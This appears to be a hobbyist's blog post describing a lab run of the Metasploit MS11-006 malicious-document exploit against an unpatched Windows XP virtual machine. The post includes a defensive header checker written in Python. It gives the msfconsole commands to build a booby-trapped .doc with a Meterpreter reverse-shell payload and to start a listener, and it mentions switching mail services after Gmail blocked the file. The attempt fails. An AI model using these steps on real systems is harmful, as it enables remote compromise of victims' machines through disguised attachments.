Metasploit Meterpreter: MS11-006 Client-Side Malicious Document Exploit – Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow

I’m following the instructions given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

Metasploit describes this exploit thus:

This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution. In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.
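The trigger condition in that description, a thumbnail bitmap whose biClrUsed field is negative when read as a signed 32-bit integer, is something a defender can check for in a parsed BITMAPINFOHEADER. The checker below is an added example written for this post, not code from Metasploit or from the book; it assumes you have already extracted the 40-byte thumbnail header from the document, and its sample headers are constructed, not taken from a real file.

```python
import struct

# BITMAPINFOHEADER layout (40 bytes, little-endian):
# biSize, biWidth, biHeight, biPlanes, biBitCount, biCompression,
# biSizeImage, biXPelsPerMeter, biYPelsPerMeter, biClrUsed, biClrImportant
BIH_FMT = "<IiiHHIIiiII"
BIH_SIZE = struct.calcsize(BIH_FMT)  # 40


def check_dib_header(data: bytes) -> dict:
    """Parse a BITMAPINFOHEADER and flag a biClrUsed that is negative when
    read as a signed 32-bit int (the MS11-006 trigger) or larger than the
    palette the bit depth allows."""
    if len(data) < BIH_SIZE:
        return {"ok": False, "reason": "truncated header"}
    fields = struct.unpack(BIH_FMT, data[:BIH_SIZE])
    bi_size, bitcount, clr_used = fields[0], fields[4], fields[9]
    if bi_size != BIH_SIZE:
        return {"ok": False, "reason": f"unexpected biSize {bi_size}"}
    # biClrUsed is a DWORD, but the vulnerable code treated it as signed,
    # so re-interpret the same 32 bits as a signed int before comparing.
    signed_clr_used = struct.unpack("<i", struct.pack("<I", clr_used))[0]
    if signed_clr_used < 0:
        return {"ok": False, "reason": "negative biClrUsed",
                "biClrUsed": clr_used}
    # Indexed images (1/4/8 bpp) can have at most 2**biBitCount palette entries.
    if 0 < bitcount <= 8 and clr_used > (1 << bitcount):
        return {"ok": False, "reason": "biClrUsed exceeds palette size",
                "biClrUsed": clr_used}
    return {"ok": True, "reason": "", "biClrUsed": clr_used}


def make_header(width: int, height: int, bitcount: int, clr_used: int) -> bytes:
    """Build a constructed BITMAPINFOHEADER for exercising the checker."""
    return struct.pack(BIH_FMT, BIH_SIZE, width, height, 1, bitcount, 0,
                       0, 2835, 2835, clr_used & 0xFFFFFFFF, 0)


# Constructed samples: a normal 8-bit thumbnail header, and one whose
# biClrUsed is 0xFFFFFFFF, i.e. -1 when treated as signed.
BENIGN_HEADER = make_header(96, 96, 8, 256)
SUSPICIOUS_HEADER = make_header(96, 96, 8, -1)

if __name__ == "__main__":
    for name, hdr in (("benign", BENIGN_HEADER), ("suspicious", SUSPICIOUS_HEADER)):
        print(name, check_dib_header(hdr))
```

Locating the thumbnail inside a .MIC or Office container is a separate step this snippet does not perform.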

The first step is to create the malicious document within Metasploit:

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf exploit(ms11_006_createsizeddibsection) > set outputpath /root/ <– I changed the output directory as the original one didn’t exist.
outputpath => /root/
msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.70 <– Attacking machine.
LHOST => 192.168.1.70
msf exploit(ms11_006_createsizeddibsection) > set LPORT 447 <– Attacking machine port.
LPORT => 447
msf exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating ‘msf.doc’ file …
[*] Generated output file /root/msf.doc <– File created.

I then emailed the created “malicious” file as an attachment, to open on the target Windows machine. I was very impressed with Google Gmail as it rejected the email and noted:

Our system detected an illegal attachment on your message

So, I had to send the file via another web based mail system.

Before opening the file on the target Windows system, I needed to set up the attacking machine to listen for incoming connections from the target machine:

msf exploit(ms11_006_createsizeddibsection) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(handler) > set LPORT 447
LPORT => 447
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.70:447
[*] Starting the payload handler…

I then opened the malicious file on the target machine and viewed it as a thumbnail in the hope it would trigger the exploit; however, nothing happened, and the hack failed.

Microsoft lists the Windows versions affected by this exploit and my x32 XP Pro SP2 is not listed, so perhaps this is the reason the exploit failed. The above book states the Windows system should be SP3, which mine is not.

A little disappointed.

Anyway, here’s a nice step-by-step guide to this exploit.

And this video may or may not be useful:
